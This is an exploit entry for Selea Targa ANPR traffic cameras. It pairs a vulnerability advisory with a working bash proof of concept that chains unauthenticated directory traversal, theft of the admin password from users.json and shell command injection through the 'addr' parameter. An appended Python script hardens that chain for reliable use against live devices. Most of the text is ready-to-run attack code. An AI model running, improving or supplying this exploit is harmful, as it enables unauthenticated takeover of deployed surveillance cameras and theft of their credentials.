# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

#!/bin/bash
#
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
#
#
# Vendor: Selea s.r.l.
# Product web page: https://www.selea.com
# Affected version: Model: iZero
#                          Targa 512
#                          Targa 504
#                          Targa Semplice
#                          Targa 704 TKM
#                          Targa 805
#                          Targa 710 INOX
#                          Targa 750
#                          Targa 704 ILB
#                   Firmware: BLD201113005214
#                             BLD201106163745
#                             BLD200304170901
#                             BLD200304170514
#                             BLD200303143345
#                             BLD191118145435
#                             BLD191021180140
#                   CPS: 4.013(201105)
#                        3.100(200225)
#                        3.005(191206)
#                        3.005(191112)
#
# Summary: IP camera with optical character recognition (OCR) software for automatic
# number plate recognition (ANPR), also equipped with an ADR system that enables it to
# read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN
# number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading
# number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens
# makes this camera suitable for all installation conditions. Its built-in OCR software
# works as an automatic and independent system without the need of a computer, thus
# giving autonomy to the device even in the event of an interruption in the connection
# between the camera and the operations centre.
#
# Desc: The Selea Targa camera suffers from an authenticated OS command injection
# vulnerability. The 'addr' and 'port' HTTP GET parameters of the addr_check command
# in the utils.php page reach a shell unsanitised, so an authenticated user can inject
# and execute arbitrary shell commands as the www-data user. The double quotes around
# "$ADDR" and "$PORT" in address_check.sh (below) offer no protection: a $(...)
# substitution placed in the parameter has already been expanded by the time the
# script receives its arguments, as the PoC output shows. By chaining the
# unauthenticated LFI (directory traversal) issue under /CFCARD/images/, an attacker
# can read /mnt/data/auth/users.json, recover the admin password, authenticate and
# execute system commands without any prior credentials.
#
# =====================================================================================
# /mnt/app/scripts/address_check.sh:
# ----------------------------------
#
# #!/bin/sh
# . /mnt/app/scripts/env.sh
# . /mnt/app/scripts/log.sh
#
# CMD="$1"
# ADDR="$2"
# PORT="$3"
#
# if [ "$CMD" == "ping" ]; then
#   RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
# elif [ "$CMD" == "port" ]; then
#   log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
#   RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
# fi
#
# echo -e "$RESULT"
#
# =====================================================================================
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
#            PHP/5.6.22
#            selea_httpd
#            HttpServer/0.1
#            SeleaCPSHttpServer/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5620
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
#
#
# 07.11.2020
#
#
# PoC chained exploit (as admin):
#
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
# Password found: testingus
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
# Using command: id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#

if [ $# -ne 2 ]; then
  echo "Usage: $0 <camera-ip> <command>"
  exit 1
fi

IP=$1
CMD=$2

# Step 1: unauthenticated directory traversal through /CFCARD/images/ reads the
# credential store; the admin password is the value of the root_pwd key.
PASS=$(curl -s "http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json" | grep -oP 'root_pwd": "\K.*?(?=",)')
echo 'Password found: '${PASS}

# Step 2: build the Basic auth token (echo appends a newline, hence the trailing
# "Cg==" in the header shown in the PoC output; the camera accepts it anyway).
AUTH=$(echo admin:${PASS} | base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}

# Step 3: authenticated command injection through the 'addr' parameter. The
# command is wrapped in $(...) behind the marker address 1.3.3.7 so its output
# can be grepped back out of the nc result that utils.php returns.
curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" | grep -oP '1.3.3.7\K.*?(?=")'
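The bash PoC above works for `id`, but its grep for `root_pwd` breaks if the password contains an escaped quote or is the last key in the object (no trailing comma), and the raw `${CMD}` in the URL breaks for any command containing a space, `&` or `#`. The following is an added example, not LiquidWorm's code, that builds and parses the same chain with those edge cases handled: a real JSON parse of users.json with the PoC's regex as fallback, a Basic auth token without the stray newline, and percent-encoding of the injected value. The traversal path, the `1.3.3.7` marker and the parameter names come from the advisory; the nested layout of users.json and the shape of the utils.php response body are assumptions (the sample inputs in the comments are constructed, not captured from a device).

```python
"""Request builder and response parser for the Selea Targa LFI -> command
injection chain. Added example, not the advisory's PoC: the pure functions can
be exercised offline, and run() is the only part that touches the network."""
import base64
import json
import re
import sys
import urllib.parse
import urllib.request

# Traversal path copied verbatim from the advisory's PoC.
USERS_JSON_PATH = ("/CFCARD/images/SeleaCamera/"
                   "%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"
                   "mnt/data/auth/users.json")
MARKER = "1.3.3.7"  # sentinel address the PoC greps for in the response


def lfi_url(host):
    return f"http://{host}{USERS_JSON_PATH}"


def _find_key(obj, key):
    """Depth-first search for `key` in nested dicts/lists. The exact layout of
    users.json is not shown in the advisory, so no particular nesting is assumed."""
    if isinstance(obj, dict):
        if key in obj:
            return obj[key]
        obj = list(obj.values())
    if isinstance(obj, list):
        for item in obj:
            found = _find_key(item, key)
            if found is not None:
                return found
    return None


def extract_root_pwd(text):
    """Recover root_pwd from the users.json body. A real JSON parse copes with
    escaped quotes and with root_pwd being the last key (no trailing comma),
    both of which defeat the PoC's grep. If the body is not valid JSON, fall
    back to the same regex the PoC used."""
    try:
        return _find_key(json.loads(text), "root_pwd")
    except ValueError:
        m = re.search(r'root_pwd":\s*"(.*?)"', text)
        return m.group(1) if m else None


def basic_auth_header(user, pwd):
    """Basic auth value without the trailing newline that `echo ... | base64`
    appended in the bash PoC (the 'Cg==' at the end of its header)."""
    token = base64.b64encode(f"{user}:{pwd}".encode()).decode()
    return f"Basic {token}"


def injection_url(host, cmd, marker=MARKER):
    """addr=<marker>$(cmd): the substitution runs on the camera; the marker
    lets us locate the output. Percent-encoding the whole value keeps commands
    containing spaces, '&' or '#' intact in the query string."""
    query = urllib.parse.urlencode({
        "cmd": "addr_check",
        "addr": f"{marker}$({cmd})",
        "type": "port",
        "port": "80",
    })
    return f"http://{host}/cgi-bin/utils.php?{query}"


def extract_output(body, marker=MARKER):
    """The command output is spliced into the address string the camera echoes
    back (assumed from the PoC's grep); return everything between the marker
    and the next double quote, across line breaks so multi-line output survives."""
    m = re.search(re.escape(marker) + r'(.*?)"', body, re.S)
    return m.group(1).strip() if m else None


def run(host, cmd, user="admin"):
    """Network step: LFI for the password, then the authenticated injection."""
    with urllib.request.urlopen(lfi_url(host), timeout=10) as resp:
        pwd = extract_root_pwd(resp.read().decode("utf-8", "replace"))
    if pwd is None:
        raise RuntimeError("root_pwd not found in users.json")
    req = urllib.request.Request(
        injection_url(host, cmd),
        headers={"Authorization": basic_auth_header(user, pwd)})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return extract_output(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <camera-ip> <command>")
    print(run(sys.argv[1], sys.argv[2]))
```

`urllib.parse.urlencode` turns `1.3.3.7$(cat /etc/passwd)` into `1.3.3.7%24%28cat+%2Fetc%2Fpasswd%29`, which PHP decodes back to the literal value before it reaches the shell, so the injection is unchanged while the URL stays well-formed.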